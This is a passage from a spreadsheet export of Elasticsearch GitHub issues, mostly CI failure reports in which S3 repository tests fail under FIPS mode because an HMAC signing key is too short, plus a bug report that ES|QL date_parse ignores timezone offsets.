org.elasticsearch.repositories.s3.S3BlobContainer.writeBlob(S3BlobContainer.java:142)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.blobstore.BlobContainer.writeBlob(BlobContainer.java:124)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlobAtomic(S3BlobContainer.java:304)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.blobstore.BlobStoreRepository.startVerification(BlobStoreRepository.java:2205)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.RepositoriesService.lambda$validatePutRepositoryRequest$11(RepositoriesService.java:373)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable$1.doRun(ActionRunnable.java:37)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1023)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\n\ \tat java.base/java.lang.Thread.run(Thread.java:833)\nCaused by: org.bouncycastle.crypto.IllegalKeyException:\ \ Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\ \tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.jcajce.provider.BaseHMac.engineInit(Unknown\ \ Source)\n\tat java.base/javax.crypto.Mac.init(Mac.java:432)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\ \t 38 more\n" stack_trace: "com.amazonaws.SdkClientException: Unable to calculate a request\ \ signature: Unable to calculate a request signature: Key size for HMAC must\ \ be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\ \tat com.amazonaws.auth.AWS4Signer.newSigningKey(AWS4Signer.java:639)\n\t\ at com.amazonaws.auth.AWS4Signer.deriveSigningKey(AWS4Signer.java:404)\n\t\ at com.amazonaws.auth.AWS4Signer.sign(AWS4Signer.java:253)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeOneRequest(AmazonHttpClient.java:1320)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeHelper(AmazonHttpClient.java:1157)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.doExecute(AmazonHttpClient.java:814)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeWithTimer(AmazonHttpClient.java:781)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.execute(AmazonHttpClient.java:755)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.access$500(AmazonHttpClient.java:715)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutionBuilderImpl.execute(AmazonHttpClient.java:697)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:561)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:541)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5456)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5403)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.access$300(AmazonS3Client.java:421)\n\ \tat com.amazonaws.services.s3.AmazonS3Client$PutObjectStrategy.invokeServiceCall(AmazonS3Client.java:6531)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.uploadObject(AmazonS3Client.java:1861)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.putObject(AmazonS3Client.java:1821)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$executeSingleUpload$16(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.lambda$doPrivilegedVoid$0(SocketAccess.java:47)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:318)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedVoid(SocketAccess.java:46)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$writeBlob$1(S3BlobContainer.java:144)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:569)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedIOException(SocketAccess.java:38)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlob(S3BlobContainer.java:142)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.blobstore.BlobContainer.writeBlob(BlobContainer.java:124)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlobAtomic(S3BlobContainer.java:304)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.blobstore.BlobStoreRepository.startVerification(BlobStoreRepository.java:2205)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.RepositoriesService.lambda$validatePutRepositoryRequest$11(RepositoriesService.java:373)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable$1.doRun(ActionRunnable.java:37)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1023)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\n\ \tat java.base/java.lang.Thread.run(Thread.java:833)\nCaused by: com.amazonaws.SdkClientException:\ \ Unable to calculate a request signature: Key size for HMAC must be at least\ \ 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\ \t 37 more\nCaused by: org.bouncycastle.crypto.IllegalKeyException: Key\ \ size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\ \tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.jcajce.provider.BaseHMac.engineInit(Unknown\ \ Source)\n\tat java.base/javax.crypto.Mac.init(Mac.java:432)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\ \t 38 more\n" stack_trace: "java.io.IOException: Unable to upload object [ec2_base_path/tests-X8eE8K6AQYesIdw10Xk6vw/master.dat]\ \ using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$writeBlob$1(S3BlobContainer.java:144)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:569)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedIOException(SocketAccess.java:38)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlob(S3BlobContainer.java:142)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.blobstore.BlobContainer.writeBlob(BlobContainer.java:124)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlobAtomic(S3BlobContainer.java:304)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.blobstore.BlobStoreRepository.startVerification(BlobStoreRepository.java:2205)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.RepositoriesService.lambda$validatePutRepositoryRequest$11(RepositoriesService.java:373)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable$1.doRun(ActionRunnable.java:37)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1023)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\n\ \tat java.base/java.lang.Thread.run(Thread.java:833)\nCaused by: com.amazonaws.SdkClientException:\ \ Unable to calculate a request signature: Unable to calculate a request signature:\ \ Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\ \tat com.amazonaws.auth.AWS4Signer.newSigningKey(AWS4Signer.java:639)\n\tat\ \ com.amazonaws.auth.AWS4Signer.deriveSigningKey(AWS4Signer.java:404)\n\tat\ \ com.amazonaws.auth.AWS4Signer.sign(AWS4Signer.java:253)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeOneRequest(AmazonHttpClient.java:1320)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeHelper(AmazonHttpClient.java:1157)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.doExecute(AmazonHttpClient.java:814)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeWithTimer(AmazonHttpClient.java:781)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.execute(AmazonHttpClient.java:755)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.access$500(AmazonHttpClient.java:715)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutionBuilderImpl.execute(AmazonHttpClient.java:697)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:561)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:541)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5456)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5403)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.access$300(AmazonS3Client.java:421)\n\ \tat com.amazonaws.services.s3.AmazonS3Client$PutObjectStrategy.invokeServiceCall(AmazonS3Client.java:6531)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.uploadObject(AmazonS3Client.java:1861)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.putObject(AmazonS3Client.java:1821)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$executeSingleUpload$16(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.lambda$doPrivilegedVoid$0(SocketAccess.java:47)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:318)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedVoid(SocketAccess.java:46)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:464)\n\ \t 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate\ \ a request signature: Key size for HMAC must be at least 112 bits in approved\ \ mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\ \t 37 more\nCaused by: org.bouncycastle.crypto.IllegalKeyException: Key size\ \ for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.jcajce.provider.BaseHMac.engineInit(Unknown\ \ Source)\n\tat java.base/javax.crypto.Mac.init(Mac.java:432)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\ \t 38 more\n" stack_trace: "org.elasticsearch.repositories.RepositoryVerificationException: [repository_ec2]\ \ path [ec2_base_path] is not accessible on master node\nCaused by: java.io.IOException:\ \ Unable to upload object [ec2_base_path/tests-X8eE8K6AQYesIdw10Xk6vw/master.dat]\ \ using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$writeBlob$1(S3BlobContainer.java:144)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:569)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedIOException(SocketAccess.java:38)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlob(S3BlobContainer.java:142)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.blobstore.BlobContainer.writeBlob(BlobContainer.java:124)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlobAtomic(S3BlobContainer.java:304)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.blobstore.BlobStoreRepository.startVerification(BlobStoreRepository.java:2205)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.RepositoriesService.lambda$validatePutRepositoryRequest$11(RepositoriesService.java:373)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable$1.doRun(ActionRunnable.java:37)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1023)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\n\ \tat java.base/java.lang.Thread.run(Thread.java:833)\nCaused by: com.amazonaws.SdkClientException:\ \ Unable to calculate a request signature: Unable to calculate a request signature:\ \ Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\t\ at com.amazonaws.auth.AWS4Signer.newSigningKey(AWS4Signer.java:639)\n\tat com.amazonaws.auth.AWS4Signer.deriveSigningKey(AWS4Signer.java:404)\n\ \tat com.amazonaws.auth.AWS4Signer.sign(AWS4Signer.java:253)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeOneRequest(AmazonHttpClient.java:1320)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeHelper(AmazonHttpClient.java:1157)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.doExecute(AmazonHttpClient.java:814)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeWithTimer(AmazonHttpClient.java:781)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.execute(AmazonHttpClient.java:755)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.access$500(AmazonHttpClient.java:715)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutionBuilderImpl.execute(AmazonHttpClient.java:697)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:561)\n\t\ at com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:541)\n\t\ at com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5456)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5403)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.access$300(AmazonS3Client.java:421)\n\ \tat com.amazonaws.services.s3.AmazonS3Client$PutObjectStrategy.invokeServiceCall(AmazonS3Client.java:6531)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.uploadObject(AmazonS3Client.java:1861)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.putObject(AmazonS3Client.java:1821)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$executeSingleUpload$16(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.lambda$doPrivilegedVoid$0(SocketAccess.java:47)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:318)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedVoid(SocketAccess.java:46)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:464)\n\ \t 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate\ \ a request signature: Key size for HMAC must be at least 112 bits in approved\ \ mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t\  37 more\nCaused by: org.bouncycastle.crypto.IllegalKeyException: Key size\ \ for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.jcajce.provider.BaseHMac.engineInit(Unknown\ \ Source)\n\tat java.base/javax.crypto.Mac.init(Mac.java:432)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\ \t 38 more\n" status: 500 ]  **Issue Reasons:** - [8.x] 2 consecutive failures in step openjdk17_checkpart1_java-fips-matrix - [8.x] 6 failures in class org.elasticsearch.repositories.s3.RepositoryS3ClientYamlTestSuiteIT (1.5% fail rate in 413 executions) - [8.x] 6 failures in step openjdk17_checkpart1_java-fips-matrix (75.0% fail rate in 8 executions) - [8.x] 6 failures in pipeline elasticsearch-periodic (54.5% fail rate in 11 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/117680</t>
  </si>
  <si>
    <t>[ES|QL] date_parse seems to ignore timezone</t>
  </si>
  <si>
    <t xml:space="preserve"> Elasticsearch Version 8.16.0  Installed Plugins _No response_  Java Version _bundled_  OS Version Linux amd64 5.15.0-1032-gcp  Problem Description  POST /_query { "query":  row message = "192.168.1.199 - - [12/Jul/2022:10:24:10 +0900] \"GET /cgi-bin/try/ HTTP/1.0\" 200 3005" | grok message "%{COMMONAPACHELOG}" | keep timestamp | eval @timestamp = date_parse("dd/MMM/yyyy:HH:mm:ss Z", timestamp)  }  produces  { "took": 15, "columns": [ { "name": "timestamp", "type": "keyword" }, { "name": "@timestamp", "type": "date" } ], "values": [ [ "12/Jul/2022:10:24:10 +0900", "2022-07-12T10:24:10.000Z" ] ] }  but  POST /_ingest/pipeline/_simulate { "pipeline": { "processors": [ { "date": { "field": "timestamp", "formats": [ "dd/MMM/yyyy:HH:mm:ss Z" ] } } ] }, "docs": [ { "_index": "index", "_id": "id", "_source": { "timestamp": "12/Jul/2022:10:24:10 +0900" } } ] }  produces  { "docs": [ { "doc": { "_index": "index", "_version": "-3", "_id": "id", "_source": { "timestamp": "12/Jul/2022:10:24:10 +0900", "@timestamp": "2022-07-12T01:24:10.000Z" }, "_ingest": { "timestamp": "2024-11-28T07:11:48.58392818Z" } } } ] }  I suspect `date_parse` in ES|QL ignores the timezone offset. Will you look into it, please?  Steps to Reproduce You can run  POST /_query { "query":  row message = "192.168.1.199 - - [12/Jul/2022:10:24:10 +0900] \"GET /cgi-bin/try/ HTTP/1.0\" 200 3005" | grok message "%{COMMONAPACHELOG}" | keep timestamp | eval @timestamp = date_parse("dd/MMM/yyyy:HH:mm:ss Z", timestamp)  }  , which produces  { "took": 15, "columns": [ { "name": "timestamp", "type": "keyword" }, { "name": "@timestamp", "type": "date" } ], "values": [ [ "12/Jul/2022:10:24:10 +0900", "2022-07-12T10:24:10.000Z" ] ] }  I think `@timestamp` should be "2022-07-12T01:24:10.000Z".  Logs (if relevant) _No response_</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/117709</t>
  </si>
  <si>
    <t>[CI] RepositoryS3EcsClientYamlTestSuiteIT test {yaml=repository_s3/50_repository_ecs_credentials/Delete a non existing snapshot} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5099 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/juhevdup6jnps) - [elasticsearch-periodic #5081 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/nuze54fidqdos) - [elasticsearch-periodic #5075 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/3wxoydju7jwac) - [elasticsearch-periodic #5069 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/haqajpi3qx7mk) - [elasticsearch-periodic #5045 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ewn4sf6asb3ou) **Reproduction Line:**  ./gradlew ":modules:repository-s3:yamlRestTest" --tests "org.elasticsearch.repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT.test {yaml=repository_s3/50_repository_ecs_credentials/Delete a non existing snapshot}" -Dtests.seed=100082FF2DF14682 -Dtests.locale=de-AT -Dtests.timezone=America/Kentucky/Louisville -Druntime.java=17 -Dtests.fips.enabled=true  **Applicable branches:** 8.x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repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Drepository_s3%2F50_repository_ecs_credentials%2FDelete%20a%20non%20existing%20snapshot%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [repository_s3/50_repository_ecs_credentials:7]: expected [2xx] status code but api [snapshot.create_repository] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"}],"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","caused_by":{"type":"i_o_exception","reason":"Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"illegal_key_exception","reason":"Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","stack_trace":"org.bouncycastle.crypto.IllegalKeyException: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com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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java.base/java.lang.Thread.run(Thread.java:833)\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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 38 more\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"stack_trace":"java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"status":500}]  **Issue Reasons:** - [8.x] 5 failures in test test {yaml=repository_s3/50_repository_ecs_credentials/Delete a non existing snapshot} (1.3% fail rate in 373 executions) - [8.x] 5 failures in step openjdk17_checkpart1_java-fips-matrix (71.4% fail rate in 7 executions) - [8.x] 5 failures in pipeline elasticsearch-periodic (50.0% fail rate in 10 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/117710</t>
  </si>
  <si>
